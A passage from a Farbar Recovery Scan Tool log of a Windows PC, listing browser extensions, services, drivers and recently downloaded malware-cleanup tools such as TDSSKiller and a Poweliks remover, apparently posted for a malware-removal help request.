ShellIconOverlayIdentifiers: [ DropboxExt10] -> {FB314EE2-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.3.0.dll [2016-12-21] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt2] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.3.0.dll [2016-12-21] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt3] -> {FB314EDD-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.3.0.dll [2016-12-21] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt4] -> {FB314EDE-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.3.0.dll [2016-12-21] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt5] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.3.0.dll [2016-12-21] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt6] -> {FB314EDF-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.3.0.dll [2016-12-21] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt7] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.3.0.dll [2016-12-21] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt8] -> {FB314EE0-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.3.0.dll [2016-12-21] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt9] -> {FB314EE1-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.3.0.dll [2016-12-21] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShA64.dll [2016-10-03] (AVAST Software)
ShellIconOverlayIdentifiers: [BackupOverlayErr] -> {8749448C-D907-45BF-A842-4D3898894AC8} => C:\Program Files\BullGuard Ltd\BullGuard\BackupShellHook.dll [2016-12-12] (BullGuard Ltd.)
ShellIconOverlayIdentifiers: [BackupOverlayInProgress] -> {3FFBF330-7839-476B-BE14-2C8597CE11B6} => C:\Program Files\BullGuard Ltd\BullGuard\BackupShellHook.dll [2016-12-12] (BullGuard Ltd.)
ShellIconOverlayIdentifiers: [BackupOverlaySynced] -> {C62CF4DB-48CB-4B03-BFD0-30A29125FA49} => C:\Program Files\BullGuard Ltd\BullGuard\BackupShellHook.dll [2016-12-12] (BullGuard Ltd.)
ShellIconOverlayIdentifiers: [DBRShellOverlayBackupFile] -> {831CEBDD-6BAF-4432-BE76-9E0989C14AEF} => C:\Program Files (x86)\Dell Backup and Recovery\Components\Shell\DBROverlayIconBackuped.dll [2014-12-30] (Softthinks SAS)
ShellIconOverlayIdentifiers: [DBRShellOverlayModifiedBackupFile] -> {275E4FD7-21EF-45CF-A836-832E5D2CC1B3} => C:\Program Files (x86)\Dell Backup and Recovery\Components\Shell\DBROverlayIconNotBackuped.dll [2014-12-30] (Softthinks SAS)
ShellIconOverlayIdentifiers-x32: [ DropboxExt1] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.3.0.dll [2016-12-21] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt10] -> {FB314EE2-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.3.0.dll [2016-12-21] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt2] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.3.0.dll [2016-12-21] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt3] -> {FB314EDD-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.3.0.dll [2016-12-21] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt4] -> {FB314EDE-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.3.0.dll [2016-12-21] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt5] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.3.0.dll [2016-12-21] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt6] -> {FB314EDF-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.3.0.dll [2016-12-21] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt7] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.3.0.dll [2016-12-21] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt8] -> {FB314EE0-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.3.0.dll [2016-12-21] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt9] -> {FB314EE1-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.3.0.dll [2016-12-21] (Dropbox, Inc.)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Bluetooth.lnk [2015-12-22]
ShortcutTarget: Bluetooth.lnk -> C:\Program Files\WIDCOMM\Bluetooth Software\BTTray.exe (Broadcom Corporation.)
Startup: C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ERUNT AutoBackup.lnk [2017-01-07]
ShortcutTarget: ERUNT AutoBackup.lnk -> D:\Program Files (x86)\ERUNT\AUTOBACK.EXE (No File)
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
Tcpip\Parameters: [DhcpNameServer] 192.168.254.254
Tcpip\..\Interfaces\{D97DFD45-2154-4A46-8F80-68A5472C7513}: [DhcpNameServer] 192.168.254.254
 
Internet Explorer:
==================
HKU\S-1-5-21-1863785947-2063213224-1850305329-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://dell13.msn.com/?pc=DCTE
HKU\S-1-5-21-1863785947-2063213224-1850305329-1000\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://dell13.msn.com/?pc=DCTE
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKU\S-1-5-21-1863785947-2063213224-1850305329-1000 -> DefaultScope {2B5C0A4C-99CC-46EB-B17C-C75AFE7B4F4D} URL = 
BHO: avast! Online Security -> {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} -> C:\Program Files\AVAST Software\Avast\aswWebRepIE64.dll [2016-10-24] (AVAST Software)
BHO: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll [2016-04-26] (Google Inc.)
BHO-x32: avast! Online Security -> {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} -> C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll [2016-10-24] (AVAST Software)
BHO-x32: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll [2016-04-26] (Google Inc.)
Toolbar: HKLM - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll [2016-04-26] (Google Inc.)
Toolbar: HKLM-x32 - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll [2016-04-26] (Google Inc.)
Toolbar: HKU\S-1-5-21-1863785947-2063213224-1850305329-1000 -> Google Toolbar - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll [2016-04-26] (Google Inc.)
 
FireFox:
========
FF ProfilePath: C:\Users\Owner\AppData\Roaming\Mozilla\Firefox\Profiles\xcdclexh.default-1479927646311 [2017-01-10]
FF Extension: (Nav Bar Height) - C:\Users\Owner\AppData\Roaming\Mozilla\Firefox\Profiles\xcdclexh.default-1479927646311\Extensions\{70768549-a666-4368-8efa-6d24ad93777a}.xpi [2016-11-28]
FF Extension: (Themes Menu) - C:\Users\Owner\AppData\Roaming\Mozilla\Firefox\Profiles\xcdclexh.default-1479927646311\Extensions\{84625510-7e5d-11e0-a411-0800200c9a66}.xpi [2016-11-28]
FF Extension: (Theme Font & Size Changer) - C:\Users\Owner\AppData\Roaming\Mozilla\Firefox\Profiles\xcdclexh.default-1479927646311\Extensions\{f69e22c7-bc50-414a-9269-0f5c344cd94c}.xpi [2017-01-06]
FF HKLM\...\Firefox\Extensions: [wrc@avast.com] - C:\Program Files\AVAST Software\Avast\WebRep\FF
FF Extension: (Avast Online Security) - C:\Program Files\AVAST Software\Avast\WebRep\FF [2016-10-03]
FF HKLM\...\Firefox\Extensions: [sp@avast.com] - C:\Program Files\AVAST Software\Avast\SafePrice\FF
FF Extension: (Avast SafePrice) - C:\Program Files\AVAST Software\Avast\SafePrice\FF [2016-10-03]
FF HKLM-x32\...\Firefox\Extensions: [wrc@avast.com] - C:\Program Files\AVAST Software\Avast\WebRep\FF
FF HKLM-x32\...\Firefox\Extensions: [sp@avast.com] - C:\Program Files\AVAST Software\Avast\SafePrice\FF
FF HKLM-x32\...\Firefox\Extensions: [antiphishing@bullguard] - C:\Program Files\BullGuard Ltd\BullGuard\Files32\Antiphishing\FF\antiphishing@bullguard => not found
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_24_0_0_186.dll [2017-01-08] ()
FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files\Microsoft Silverlight\5.1.50901.0\npctrl.dll [2016-08-31] ( Microsoft Corporation)
FF Plugin: @wacom.com/wtPlugin,version=2.1.0.7 -> C:\Program Files\TabletPlugins\npWacomTabletPlugin.dll [2014-03-25] (Wacom)
FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll [2016-08-24] (Adobe Systems)
FF Plugin: wacom.com/WacomTabletPlugin -> C:\Program Files\TabletPlugins\npWacomTabletPlugin.dll [2014-03-25] (Wacom)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_24_0_0_186.dll [2017-01-08] ()
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.68 -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIIPT.dll [2015-08-24] (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2015-08-24] (Intel Corporation)
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files (x86)\Microsoft Silverlight\5.1.50901.0\npctrl.dll [2016-08-31] ( Microsoft Corporation)
FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll [2016-07-10] (NVIDIA Corporation)
FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll [2016-07-10] (NVIDIA Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.32.7\npGoogleUpdate3.dll [2016-12-16] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.32.7\npGoogleUpdate3.dll [2016-12-16] (Google Inc.)
FF Plugin-x32: @wacom.com/wtPlugin,version=2.1.0.7 -> C:\Program Files (x86)\TabletPlugins\npWacomTabletPlugin.dll [2014-03-25] (Wacom)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll [2016-06-23] (Adobe Systems Inc.)
FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect32.dll [2016-08-24] (Adobe Systems)
FF Plugin-x32: wacom.com/WacomTabletPlugin -> C:\Program Files (x86)\TabletPlugins\npWacomTabletPlugin.dll [2014-03-25] (Wacom)
FF Plugin HKU\S-1-5-21-1863785947-2063213224-1850305329-1000: @citrixonline.com/appdetectorplugin -> C:\Users\Owner\AppData\Local\Citrix\Plugins\104\npappdetector.dll [2016-02-12] (Citrix Online)
 
Chrome: 
=======
CHR StartupUrls: Default -> "hxxp://www.google.com/"
CHR Profile: C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default [2017-01-10]
CHR Extension: (Google Slides) - C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2016-02-01]
CHR Extension: (BetterTTV) - C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\ajopnjidmegmdimjlfnijceegpefgped [2016-08-03]
CHR Extension: (Google Docs) - C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2016-02-01]
CHR Extension: (Google Drive) - C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2016-02-01]
CHR Extension: (YouTube) - C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2016-02-01]
CHR Extension: (Google Search) - C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2016-02-01]
CHR Extension: (Avast SafePrice) - C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\eofcbnmajmjmplflapaojjnihcjkigck [2016-11-22]
CHR Extension: (Google Sheets) - C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2016-02-01]
CHR Extension: (Google Docs Offline) - C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-03-22]
CHR Extension: (Avast Online Security) - C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\gomekmidlodglbbmalcneegieacbdmki [2016-12-20]
CHR Extension: (Make America Kittens Again) - C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\klchnmggepghlcolikgaekpibclpmgcm [2017-01-07]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2016-04-10]
CHR Extension: (Gmail) - C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2016-02-01]
CHR Extension: (Chrome Media Router) - C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2016-12-20]
CHR HKLM-x32\...\Chrome\Extension: [eofcbnmajmjmplflapaojjnihcjkigck] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [gomekmidlodglbbmalcneegieacbdmki] - C:\Program Files\AVAST Software\Avast\WebRep\Chrome\aswWebRepChrome.crx <not found>
 
==================== Services (Whitelisted) ====================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
R2 AdobeUpdateService; C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe [744640 2016-08-24] (Adobe Systems Incorporated)
R2 AGSService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe [2218712 2016-12-13] (Adobe Systems, Incorporated)
R2 Apple Mobile Device Service; C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [83768 2016-09-22] (Apple Inc.)
R2 avast! Antivirus; C:\Program Files\AVAST Software\Avast\AvastSvc.exe [197128 2016-10-03] (AVAST Software)
R2 BsBackup; C:\Program Files\BullGuard Ltd\BullGuard\BsBackup.dll [1540376 2017-01-09] (BullGuard Ltd.)
R2 BsBhvScan; C:\Program Files\BullGuard Ltd\BullGuard\BullGuardBhvScanner.exe [705304 2016-12-12] (BullGuard Ltd.)
R2 BsCache; C:\Program Files\BullGuard Ltd\BullGuard\BsCache.dll [184600 2016-12-12] (BullGuard Ltd.)
R2 BsFileScan; C:\Program Files\BullGuard Ltd\BullGuard\BsFileScan.dll [487704 2016-12-12] (BullGuard Ltd.)
R2 BsFire; C:\Program Files\BullGuard Ltd\BullGuard\BsFire.dll [860952 2016-12-12] (BullGuard Ltd.)
R2 BsMailProxy; C:\Program Files\BullGuard Ltd\BullGuard\BsMailProxy\BsMailProxy.dll [5660440 2016-12-12] (BullGuard Ltd.)
R2 BsMain; C:\Program Files\BullGuard Ltd\BullGuard\BsMain.dll [652056 2016-12-12] (BullGuard Ltd.)
R2 BsScanner; C:\Program Files\BullGuard Ltd\BullGuard\BullGuardScanner.exe [317208 2016-12-12] (BullGuard Ltd.)
R2 BsUpdate; C:\Program Files\BullGuard Ltd\BullGuard\BullGuardUpdate.exe [409880 2016-12-12] (BullGuard Ltd.)
S2 dbupdate; C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [143144 2016-08-04] (Dropbox, Inc.)
S3 dbupdatem; C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [143144 2016-08-04] (Dropbox, Inc.)
R2 DbxSvc; C:\Windows\system32\DbxSvc.exe [42096 2016-12-21] (Dropbox, Inc.)
R2 Dell Foundation Services; C:\Program Files\Dell\Dell Foundation Services\DFSSvc.exe [97616 2016-11-30] (Dell)
R2 DellDataVault; C:\Program Files\Dell\DellDataVault\DellDataVault.exe [2572024 2016-06-23] (Dell Inc.)
R2 DellDataVaultWiz; C:\Program Files\Dell\DellDataVault\DellDataVaultWiz.exe [202488 2016-06-23] (Dell Inc.)
R2 DellUpdate; C:\Program Files (x86)\Dell Update\DellUpService.exe [237272 2015-08-27] (Dell Inc.)
R2 GfExperienceService; C:\Program Files\NVIDIA Corporation\GeForce Experience Service\GfExperienceService.exe [1163712 2016-06-14] (NVIDIA Corporation)
R2 IAStorDataMgrSvc; C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe [18856 2015-06-23] (Intel Corporation)
S3 Intel® Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [881152 2015-05-21] (Intel® Corporation)
R2 jhi_service; C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\jhi_service.exe [207648 2015-09-04] (Intel Corporation)
R2 MBAMService; D:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe [4317648 2016-12-14] (Malwarebytes)
R2 NvNetworkService; C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe [1879488 2016-06-14] (NVIDIA Corporation)
R3 NvStreamNetworkSvc; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe [3632576 2016-06-14] (NVIDIA Corporation)
R2 NvStreamSvc; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamService.exe [2521024 2016-06-14] (NVIDIA Corporation)
R2 RtkAudioService; C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe [294616 2015-05-22] (Realtek Semiconductor)
R2 SftService; C:\Program Files (x86)\Dell Backup and Recovery\SftService.exe [2020240 2015-01-23] (SoftThinks SAS)
R2 SupportAssistAgent; C:\Program Files (x86)\Dell\SupportAssistAgent\bin\SupportAssistAgent.exe [31704 2016-09-09] (Dell Inc.)
R2 WavesSysSvc; C:\Program Files\Waves\MaxxAudio\WavesSysSvc64.exe [563456 2015-01-19] (Waves Audio Ltd.)
S3 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2015-07-22] (Microsoft Corporation)
R2 wltrysvc; C:\Program Files\Dell\DW WLAN Card\bcmwltry.exe [6179840 2015-12-22] (Dell Inc.) [File not signed]
R2 WTabletServicePro; C:\Program Files\Tablet\Wacom\WTabletServicePro.exe [742864 2016-03-21] (Wacom Technology, Corp.)
 
===================== Drivers (Whitelisted) ======================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
R1 AFW; C:\Windows\System32\DRIVERS\afw.sys [52904 2016-01-13] (Agnitum Ltd.)
R3 afwcore; C:\Windows\System32\DRIVERS\afwcore.sys [465072 2016-01-13] (Agnitum Ltd.)
S3 aswHwid; C:\Windows\system32\drivers\aswHwid.sys [37656 2016-10-03] (AVAST Software)
R1 aswKbd; C:\Windows\system32\drivers\aswKbd.sys [37144 2016-10-03] (AVAST Software)
R2 aswMonFlt; C:\Windows\system32\drivers\aswMonFlt.sys [108816 2016-10-03] (AVAST Software)
R1 aswRdr; C:\Windows\system32\drivers\aswRdr2.sys [103064 2016-10-03] (AVAST Software)
R0 aswRvrt; C:\Windows\System32\Drivers\aswRvrt.sys [74544 2016-10-03] (AVAST Software)
R1 aswSnx; C:\Windows\system32\drivers\aswSnx.sys [969184 2016-10-03] (AVAST Software)
R1 aswSP; C:\Windows\system32\drivers\aswSP.sys [513632 2016-10-03] (AVAST Software)
R2 aswStm; C:\Windows\system32\drivers\aswStm.sys [163416 2016-10-03] (AVAST Software)
R0 aswVmm; C:\Windows\System32\Drivers\aswVmm.sys [293352 2016-10-13] (AVAST Software)
R3 bcbtums; C:\Windows\System32\drivers\bcbtums.sys [172760 2015-12-22] (Broadcom Corporation.)
R1 BdAgent; C:\Windows\System32\DRIVERS\BdAgent.sys [174744 2016-08-31] (BullGuard Ltd.)
R3 BdNet; C:\Windows\System32\DRIVERS\BdNet.sys [33968 2016-01-13] (BullGuard Ltd.)
R1 BdSpy; C:\Windows\System32\DRIVERS\BdSpy.sys [76728 2016-01-13] (BullGuard Ltd.)
R3 DDDriver; C:\Windows\System32\drivers\DDDriver64Dcsa.sys [32464 2016-01-05] (Dell Computer Corporation)
R3 DellProf; C:\Windows\System32\drivers\DellProf.sys [24240 2016-01-05] (Dell Computer Corporation)
R3 e1dexpress; C:\Windows\System32\DRIVERS\e1d62x64.sys [501216 2015-07-09] (Intel Corporation)
R1 epp; C:\EEK\bin64\epp.sys [114968 2016-10-31] (Emsisoft Ltd)
R0 iaStorF; C:\Windows\System32\drivers\iaStorF.sys [31144 2015-06-22] (Intel Corporation)
R0 MBAMSwissArmy; C:\Windows\System32\drivers\MBAMSwissArmy.sys [250816 2017-01-10] (Malwarebytes)
R3 MEIx64; C:\Windows\System32\DRIVERS\TeeDriverx64.sys [179456 2015-08-31] (Intel Corporation)
R1 NovaShieldFilterDriver; C:\Windows\System32\DRIVERS\NSKernel.sys [325752 2016-07-11] (BullGuard Ltd.)
R1 NovaShieldTDIDriver; C:\Windows\System32\DRIVERS\NSNetmon.sys [26504 2016-07-11] (BullGuard Ltd.)
R3 NvStreamKms; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [26560 2016-06-14] (NVIDIA Corporation)
R3 nvvad_WaveExtensible; C:\Windows\System32\drivers\nvvad64v.sys [56384 2016-04-13] (NVIDIA Corporation)
R3 Trufos; C:\Windows\System32\DRIVERS\Trufos.sys [485512 2016-03-31] (BitDefender S.R.L.)
R3 WacHidRouterPro; C:\Windows\System32\DRIVERS\wachidrouter.sys [102864 2016-03-02] (Wacom Technology)
R3 XSplit_Dummy; C:\Windows\System32\drivers\xspltspk.sys [26200 2015-05-25] (SplitmediaLabs Limited)
S3 dbx; system32\DRIVERS\dbx.sys [X]
 
========================== Drivers MD5 =======================
 
 
==================== NetSvcs (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
 
==================== One Month Created files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2017-01-10 16:07 - 2017-01-10 16:08 - 00052104 _____ C:\Users\Owner\Downloads\FRST.TXT
2017-01-10 16:07 - 2017-01-10 16:07 - 02419200 _____ (Farbar) C:\Users\Owner\Downloads\FRST64.exe
2017-01-10 16:07 - 2017-01-10 16:07 - 00919040 _____ (Farbar) C:\Windows\MOD_FRST.EXE
2017-01-10 16:07 - 2017-01-10 16:07 - 00019214 _____ C:\Users\Owner\Downloads\ADDITION.TXT
2017-01-10 13:48 - 2017-01-10 13:48 - 00003484 _____ C:\Windows\System32\Tasks\PCDEventLauncherTask
2017-01-10 00:54 - 2017-01-10 00:54 - 00000238 _____ C:\Users\Owner\Desktop\newyears17 resolutions.txt
2017-01-09 13:44 - 2017-01-09 13:45 - 02747488 _____ (Symantec Corporation) C:\Users\Owner\Downloads\FixPoweliks64.exe
2017-01-09 01:17 - 2017-01-09 01:17 - 00340808 _____ C:\Users\Owner\Downloads\BullGuardDownloaderBPP (1).exe
2017-01-09 01:04 - 2017-01-10 00:42 - 00000356 _____ C:\Windows\system32\config\afw_hm.conf
2017-01-09 01:04 - 2017-01-10 00:42 - 00000004 _____ C:\Windows\system32\config\afw_db.conf
2017-01-09 00:45 - 2017-01-09 01:05 - 00000000 ____D C:\Users\Owner\AppData\Roaming\BullGuard
2017-01-09 00:45 - 2017-01-09 00:45 - 00000992 _____ C:\Users\Public\Desktop\BullGuard Premium Protection.lnk
2017-01-09 00:45 - 2017-01-09 00:45 - 00000000 ____D C:\Windows\System32\Tasks\BullGuard
2017-01-09 00:45 - 2017-01-09 00:45 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\BullGuard
2017-01-09 00:43 - 2017-01-09 00:43 - 00000000 ____D C:\Users\Owner\AppData\Roaming\QuickScan
2017-01-09 00:43 - 2017-01-09 00:43 - 00000000 ____D C:\Program Files\Common Files\BullGuard Ltd
2017-01-09 00:43 - 2017-01-09 00:43 - 00000000 ____D C:\Program Files\BullGuard Ltd
2017-01-09 00:41 - 2017-01-10 16:07 - 00000000 ____D C:\ProgramData\BullGuard
2017-01-09 00:41 - 2017-01-09 00:41 - 00340808 _____ C:\Users\Owner\Downloads\BullGuardDownloaderBPP.exe
2017-01-08 18:29 - 2017-01-08 18:29 - 00224968 _____ (ESET) C:\Users\Owner\Downloads\ESETPoweliksCleaner.exe
2017-01-08 18:29 - 2017-01-08 18:29 - 00000022 _____ C:\Users\Owner\Downloads\ESETPoweliksCleaner.exe_20170108.182950.2584.zip
2017-01-08 18:21 - 2017-01-08 18:21 - 00002954 _____ C:\Windows\System32\Tasks\{528BCCA3-349E-4E64-BAF5-C898CCD7538F}
2017-01-08 18:21 - 2017-01-08 18:21 - 00002954 _____ C:\Windows\System32\Tasks\{0BBD4685-2739-46A6-8DF8-C548A726405D}
2017-01-08 18:09 - 2017-01-08 18:09 - 02826776 _____ (Symantec Corporation) C:\Users\Owner\Downloads\stupid symant to clear Kotver64.exe
2017-01-08 17:05 - 2017-01-08 17:05 - 00000398 _____ C:\Users\Owner\Desktop\Scan_170108-170522.txt
2017-01-08 17:00 - 2017-01-08 17:34 - 00000000 ____D C:\EEK
2017-01-08 16:47 - 2017-01-08 17:00 - 280354360 _____ C:\Users\Owner\Downloads\EmsisoftEmergencyKit.exe
2017-01-08 16:13 - 2017-01-08 16:13 - 00039857 _____ C:\Users\Owner\Downloads\Shortcut.txt
2017-01-08 15:05 - 2017-01-08 15:11 - 00000000 ____D C:\Users\Owner\Desktop\mbar
2017-01-08 12:39 - 2017-01-08 12:39 - 00852798 _____ C:\Users\Owner\Downloads\SecurityCheck (1).exe
2017-01-08 11:53 - 2017-01-08 11:53 - 00005216 _____ C:\TDSSKiller.3.1.0.12_08.01.2017_11.53.02_log.txt
2017-01-08 11:49 - 2017-01-08 11:51 - 01981278 _____ C:\TDSSKiller.3.1.0.12_08.01.2017_11.49.47_log.txt
2017-01-08 11:47 - 2017-01-08 11:51 - 00000000 ____D C:\TDSSKiller_Quarantine
2017-01-08 11:46 - 2017-01-08 11:48 - 01850862 _____ C:\TDSSKiller.3.1.0.12_08.01.2017_11.46.26_log.txt
2017-01-08 11:44 - 2017-01-08 11:45 - 00230270 _____ C:\TDSSKiller.3.1.0.12_08.01.2017_11.44.45_log.txt
2017-01-08 11:42 - 2017-01-08 11:42 - 04747704 _____ (AO Kaspersky Lab) C:\Users\Owner\Downloads\tdsskiller (1).exe
2017-01-08 11:30 - 2017-01-08 11:35 - 108968280 _____ (Kaspersky Lab ZAO) C:\Users\Owner\Downloads\KVRT.exe
2017-01-08 11:01 - 2017-01-08 15:11 - 00000000 ____D C:\ProgramData\Malwarebytes' Anti-Malware (portable)
